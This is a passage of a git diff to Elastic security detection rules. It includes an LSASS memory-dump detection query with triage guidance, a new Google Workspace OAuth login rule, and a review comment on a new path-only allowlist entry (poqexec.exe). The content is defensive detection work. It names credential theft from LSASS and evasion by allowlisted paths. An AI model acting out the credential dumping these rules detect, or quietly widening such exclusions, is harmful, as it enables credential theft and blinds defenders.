JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There should be very few or no false positives for this rule. If this activity is expected or noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If the process is related to antivirus or endpoint detection and response solutions, validate that it is installed on the correct path and signed with the company's valid digital signature.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Scope compromised credentials and disable the accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nSystem Audit Policies \u003e\nObject Access \u003e\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s [SACL](https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists) has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Handle Access\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nAdversaries may attempt to access credential material stored in LSASS process memory. 
After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. This is meant to facilitate single sign-on (SSO) ensuring a user isn\u2019t prompted each time resource access is requested. These credential materials can be harvested by an adversary using administrative user or SYSTEM privileges to conduct lateral movement using [alternate authentication material](https://attack.mitre.org/techniques/T1550/).\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - 
Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There should be very few or no false positives for this rule. 
If this activity is expected or noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If the process is related to antivirus or endpoint detection and response solutions, validate that it is installed on the correct path and signed with the company's valid digital signature.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Scope compromised credentials and disable the accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s [SACL](https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists) has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "query": "any where event.action == \"File System\" and event.code == \"4656\" and\n\n winlog.event_data.ObjectName : (\n \"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"\\\\Device\\\\HarddiskVolume?\\\\Windows\\\\System32\\\\lsass.exe\",\n \"\\\\Device\\\\HarddiskVolume??\\\\Windows\\\\System32\\\\lsass.exe\") and\n\n /* The right to perform an operation controlled by an extended access right. 
*/\n\n (winlog.event_data.AccessMask : (\"0x1fffff\" , \"0x1010\", \"0x120089\", \"0x1F3FFF\") or\n winlog.event_data.AccessMaskDescription : (\"READ_CONTROL\", \"Read from process memory\"))\n\n /* Common Noisy False Positives */\n\n and not winlog.event_data.ProcessName : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\system32\\\\wbem\\\\WmiPrvSE.exe\",\n \"?:\\\\Windows\\\\System32\\\\dllhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\*.exe\",\n \"?:\\\\Windows\\\\explorer.exe\")\n", "references": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656", 
@@ -67,7 +67,7 @@
 ],
 "risk_score": 73,
 "rule_id": "208dbe77-01ed-4954-8d44-1e5751cb20de",
- "setup": "Ensure advanced audit policies for Windows are enabled, specifically:\nObject Access policies Event ID 4656 (Handle to an Object was Requested)\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nSystem Audit Policies \u003e\nObject Access \u003e\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s SACL has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "Ensure advanced audit policies for Windows are enabled, specifically:\nObject Access policies Event ID 4656 (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s SACL has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -78,7 +78,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_109.json b/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_109.json
index 22b86f2466c..cc99d16b111 100644
--- a/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_109.json
+++ b/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_109.json
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "LSASS Memory Dump Handle Access", - "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Handle Access\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nAdversaries may attempt to access credential material stored in LSASS process memory. After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. This is meant to facilitate single sign-on (SSO) ensuring a user isn\u2019t prompted each time resource access is requested. These credential materials can be harvested by an adversary using administrative user or SYSTEM privileges to conduct lateral movement using [alternate authentication material](https://attack.mitre.org/techniques/T1550/).\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path 
JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There should be very few or no false positives for this rule. If this activity is expected or noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If the process is related to antivirus or endpoint detection and response solutions, validate that it is installed on the correct path and signed with the company's valid digital signature.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Scope compromised credentials and disable the accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Handle Access\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nAdversaries may attempt to access credential material stored in LSASS process memory. After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. This is meant to facilitate single sign-on (SSO) ensuring a user isn\u2019t prompted each time resource access is requested. These credential materials can be harvested by an adversary using administrative user or SYSTEM privileges to conduct lateral movement using [alternate authentication material](https://attack.mitre.org/techniques/T1550/).\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path 
JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There should be very few or no false positives for this rule. If this activity is expected or noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If the process is related to antivirus or endpoint detection and response solutions, validate that it is installed on the correct path and signed with the company's valid digital signature.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Scope compromised credentials and disable the accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "any where event.action == \"File System\" and event.code == \"4656\" and\n\n winlog.event_data.ObjectName : (\n \"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"\\\\Device\\\\HarddiskVolume?\\\\Windows\\\\System32\\\\lsass.exe\",\n \"\\\\Device\\\\HarddiskVolume??\\\\Windows\\\\System32\\\\lsass.exe\") and\n\n /* The right to perform an operation controlled by an extended access right. */\n\n (winlog.event_data.AccessMask : (\"0x1fffff\" , \"0x1010\", \"0x120089\", \"0x1F3FFF\") or\n winlog.event_data.AccessMaskDescription : (\"READ_CONTROL\", \"Read from process memory\"))\n\n /* Common Noisy False Positives */\n\n and not winlog.event_data.ProcessName : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\system32\\\\wbem\\\\WmiPrvSE.exe\",\n \"?:\\\\Windows\\\\System32\\\\dllhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\*.exe\",\n \"?:\\\\Windows\\\\explorer.exe\",\n \"?:\\\\Windows\\\\System32\\\\poqexec.exe\")\n", "references": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656", 
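Review bot: The new `"?:\\\\Windows\\\\System32\\\\poqexec.exe"` entry at the end of the ProcessName exclusion list in the `query` has no accompanying comment, unlike the other clauses of the query which carry `/* ... */` explanations, so a later maintainer cannot tell whether it was added for a Windows servicing false positive or for something else. Like the rest of that list it is matched on `winlog.event_data.ProcessName` only, and event 4656 carries no signer or hash, so every added path widens a purely path-based allowlist; that trade-off is worth stating next to the entry so future additions are weighed the same way. Suggest `/* poqexec.exe: Windows servicing (update) component - presumably a known noisy source; confirm before widening this list further */` beside the new line. The `note` change in this hunk is escape normalisation only, and the enclosing rule object starts and ends outside the hunk.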
@@ -67,7 +67,7 @@
 ],
 "risk_score": 73,
 "rule_id": "208dbe77-01ed-4954-8d44-1e5751cb20de",
- "setup": "\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nSystem Audit Policies \u003e\nObject Access \u003e\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s [SACL](https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists) has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s [SACL](https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists) has 
the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -78,7 +78,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/210d4430-b371-470e-b879-80b7182aa75e_1.json b/packages/security_detection_engine/kibana/security_rule/210d4430-b371-470e-b879-80b7182aa75e_1.json
index a3903c7e7a1..70983709e41 100644
--- a/packages/security_detection_engine/kibana/security_rule/210d4430-b371-470e-b879-80b7182aa75e_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/210d4430-b371-470e-b879-80b7182aa75e_1.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -75,7 +75,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/21bafdf0-cf17-11ed-bd57-f661ea17fbcc_1.json b/packages/security_detection_engine/kibana/security_rule/21bafdf0-cf17-11ed-bd57-f661ea17fbcc_1.json
index b0d2de243ef..1d1dbd9ea49 100644
--- a/packages/security_detection_engine/kibana/security_rule/21bafdf0-cf17-11ed-bd57-f661ea17fbcc_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/21bafdf0-cf17-11ed-bd57-f661ea17fbcc_1.json
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -92,7 +92,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/21bafdf0-cf17-11ed-bd57-f661ea17fbcc_2.json b/packages/security_detection_engine/kibana/security_rule/21bafdf0-cf17-11ed-bd57-f661ea17fbcc_2.json
index 73178c0d306..d40b726fbc5 100644
--- a/packages/security_detection_engine/kibana/security_rule/21bafdf0-cf17-11ed-bd57-f661ea17fbcc_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/21bafdf0-cf17-11ed-bd57-f661ea17fbcc_2.json
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -89,7 +89,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/21bafdf0-cf17-11ed-bd57-f661ea17fbcc_3.json b/packages/security_detection_engine/kibana/security_rule/21bafdf0-cf17-11ed-bd57-f661ea17fbcc_3.json
new file mode 100644
index 00000000000..8eacb28d26c
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/21bafdf0-cf17-11ed-bd57-f661ea17fbcc_3.json
@@ -0,0 +1,120 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "Detects the first time a third-party application logs in and authenticated with OAuth. OAuth is used to grant permissions to specific resources and services in Google Workspace. Compromised credentials or service accounts could allow an adversary to authenticate to Google Workspace as a valid user and inherit their privileges.",
+ "false_positives": [
+ "Developers may leverage third-party applications for legitimate purposes in Google Workspace such as for administrative tasks."
+ ],
+ "from": "now-130m",
+ "history_window_start": "now-15d",
+ "index": [
+ "filebeat-*",
+ "logs-google_workspace*"
+ ],
+ "interval": "10m",
+ "language": "kuery",
+ "license": "Elastic License v2",
+ "name": "First Time Seen Google Workspace OAuth Login from Third-Party Application",
+ "new_terms_fields": [
+ "google_workspace.token.client.id"
+ ],
+ "note": "## Setup\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). 
Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html",
+ "query": "event.dataset: \"google_workspace.token\" and event.action: \"authorize\" and\ngoogle_workspace.token.scope.data.scope_name: *Login and google_workspace.token.client.id: *apps.googleusercontent.com\n",
+ "references": [
+ "https://www.elastic.co/security-labs/google-workspace-attack-surface-part-one",
+ "https://developers.google.com/apps-script/guides/bound",
+ "https://developers.google.com/identity/protocols/oauth2"
+ ],
+ "related_integrations": [
+ {
+ "package": "google_workspace",
+ "version": "^2.0.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "google_workspace.token.client.id",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "google_workspace.token.scope.data.scope_name",
+ "type": "unknown"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "21bafdf0-cf17-11ed-bd57-f661ea17fbcc",
+ "setup": "The Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "severity": "medium",
+ "tags": [
+ "Domain: Cloud",
+ "Data Source: Google Workspace",
+ "Tactic: Defense Evasion",
+ "Tactic: Initial Access"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0005",
+ "name": "Defense Evasion",
+ "reference": "https://attack.mitre.org/tactics/TA0005/"
+ },
+ "technique": [
+ {
+ "id": "T1550",
+ "name": "Use Alternate Authentication Material",
+ "reference": "https://attack.mitre.org/techniques/T1550/",
+ "subtechnique": [
+ {
+ "id": "T1550.001",
+ "name": "Application Access Token",
+ "reference": 
"https://attack.mitre.org/techniques/T1550/001/"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0001",
+ "name": "Initial Access",
+ "reference": "https://attack.mitre.org/tactics/TA0001/"
+ },
+ "technique": [
+ {
+ "id": "T1078",
+ "name": "Valid Accounts",
+ "reference": "https://attack.mitre.org/techniques/T1078/",
+ "subtechnique": [
+ {
+ "id": "T1078.004",
+ "name": "Cloud Accounts",
+ "reference": "https://attack.mitre.org/techniques/T1078/004/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "new_terms",
+ "version": 3
+ },
+ "id": "21bafdf0-cf17-11ed-bd57-f661ea17fbcc_3",
+ "type": "security-rule"
+}
